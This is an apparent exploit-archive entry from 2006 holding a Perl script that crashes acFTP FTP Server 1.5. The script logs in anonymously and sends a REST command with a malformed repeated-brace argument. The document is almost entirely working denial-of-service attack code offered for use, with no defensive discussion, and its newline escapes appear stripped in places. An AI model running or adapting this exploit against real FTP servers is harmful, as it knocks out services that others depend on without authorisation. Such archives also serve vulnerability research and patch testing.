acFTP FTP Server 1.5 (REST/PBSZ) Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : acFTP FTP Server 1.5 (REST/PBSZ) Remote Denial of Service Exploit
# Published : 2006-12-23
# Author : gbr
# Previous Title : MS Windows NetrWkstaUserEnum() Remote DoS Exploit (0day)
# Next Title : XM Easy Personal FTP Server 5.2.1 (USER) Format String DoS Exploit

#################################################
# acFTP 1.5 (REST/PBSZ) Denial of Service       #
# author: gbr                                   #
# mail: gabrielquadros[at]hotmail.com           #
#################################################


use IO::Socket;

if(!defined($ARGV[0])) {
       print "Usage: $0 ip portn";
       exit;
}

my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
                               PeerPort => $ARGV[1],
                               Proto    => 'tcp')
       or die "Could not open a socket: $!n";

$sock->recv($buf, 1024);
$sock->send("USER anonymousrn");
$sock->recv($buf, 1024);
$sock->send("PASS anonymousrn");
$sock->recv($buf, 1024);
for($i=0; $i<10; $i++) {
       $data .= "{}*{";
}

$sock->send("REST $datarn");
# $sock->send("PBSZ $datarn");

print "Server exploitedn";

# www.Syue.com [2006-12-23]